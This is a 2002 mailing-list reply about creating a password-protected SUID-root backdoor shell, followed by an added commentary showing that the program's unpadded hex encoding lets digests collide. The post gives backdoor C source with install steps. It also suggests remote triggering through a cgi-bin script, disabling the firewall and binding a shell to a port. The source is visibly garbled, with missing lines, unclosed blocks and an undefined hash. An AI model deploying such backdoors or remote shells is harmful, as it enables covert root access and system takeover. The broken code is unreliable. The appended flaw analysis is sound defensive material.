Re: No Root Shell with SUID /bin/bash

From: Peter Pan
Date: Sat, 20 Apr 2002 10:22:41 +0200 (CEST)

If you intend to place a backdoor root shell for
"personal use" in your own system (because an attacker
changed the root password) then you should write a
little program with SUID root rights, executable for
every user, but demanding a password before opening a
root shell.
Passwords should not be readable in plain text (doh!),
so use MD5 hashes or so for authentication.
A small C program which does exactly this can be found
below. It should compile on most linuxes with openssl.
If all users are logged out of your system you can
modify the program and think of a way to execute it
remotely (maybe via a cgi-bin file of your web server;
this service is rarely shut down by an attacker). Then
fight back with their own weapons: instead of running
a system("/bin/sh") execute system()-commands to shut
down the firewall and bind an authenticating shell to
some port.

/* "adr" root backdoor in own system.

   by radiodrinker at yahoo dot de

   1. compile:
      gcc adr.c -o adr -lssl
   2. As root:
      chown root adr; chmod u+s adr; chmod go+rx adr
   3. run adr. enter password of your choice.
   4. system won't let you in. copy generated md5 hash off the screen.
   5. paste md5 hash to identifier "correctMD5hash" (see below).
   6. repeat steps 1 and 2.
   7. login as non-root user. run adr. enter correct
   8. have fun.
   9. opt: move the file to
*/

#include <stdio.h>
#include <string.h>
#include <openssl/md5.h>


void hexToString(char* sourceaddress, char* destaddress, int length){
  char temp[20];
  int i;
  for(i=0; i<length; i++){
    unsigned char current=sourceaddress[i];
    sprintf(temp, "%x", current);
    strcat(destaddress, temp);
  }
}

int main(void){
  int olduid=500;
  char phrase[16384];
  char md5sum[16384];
  char md5string[16384];


    printf("must be suid root.\n");
  } else {

    printf("Banner something V2.17\n");
    printf("Enter pass phrase:");
    fgets(phrase, sizeof(phrase)-1, stdin);

    MD5(phrase, strlen(phrase), md5sum);
    hexToString(md5sum, md5string, 16);

    if(strncmp(md5string, correctMD5hash,
      // then it does not match.
      printf("md5 value of pass phrase is: %s\nSorry.\n", md5string);
      printf("Welcome back. Have fun.\n");
  return 0;


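An added example, not part of the original message: the posted hexToString formats each digest byte with an unpadded `%x`, so bytes below 0x10 lose their leading zero and two different digests can produce the same string, which weakens the hash comparison. The program below shows this with two constructed 16-byte values and contrasts it with fixed-width `%02x`; the function names and sample bytes are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define DIGEST_LEN 16 /* MD5 digest size in bytes */

typedef void (*encoder)(const unsigned char *, size_t, char *);

/* Unpadded "%x", as in the posted hexToString: a byte below 0x10
   becomes a single character, so byte boundaries are lost. */
static void hex_unpadded(const unsigned char *in, size_t n, char *out) {
    size_t off = 0;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++)
        off += (size_t)sprintf(out + off, "%x", in[i]);
}

/* Fixed width "%02x": always two characters per byte. */
static void hex_padded(const unsigned char *in, size_t n, char *out) {
    out[0] = '\0';
    for (size_t i = 0; i < n; i++)
        sprintf(out + 2 * i, "%02x", in[i]);
}

/* Constructed sample values, not real MD5 outputs. They differ only in
   the first two bytes: 0x01 0x23 versus 0x12 0x03. */
static const unsigned char digest_a[DIGEST_LEN] = {
    0x01, 0x23, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
    0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80};
static const unsigned char digest_b[DIGEST_LEN] = {
    0x12, 0x03, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
    0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80};

/* Returns 1 when both digests encode to the same string under enc. */
static int same_encoding(encoder enc, const unsigned char *a,
                         const unsigned char *b) {
    char sa[2 * DIGEST_LEN + 1], sb[2 * DIGEST_LEN + 1];
    enc(a, DIGEST_LEN, sa);
    enc(b, DIGEST_LEN, sb);
    return strcmp(sa, sb) == 0;
}

int main(void) {
    printf("unpadded strings equal: %d\n",
           same_encoding(hex_unpadded, digest_a, digest_b));
    printf("padded strings equal:   %d\n",
           same_encoding(hex_padded, digest_a, digest_b));
    return 0;
}
```

Comparing the raw 16 digest bytes, or a fixed-width encoding of them, keeps distinct digests distinct.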
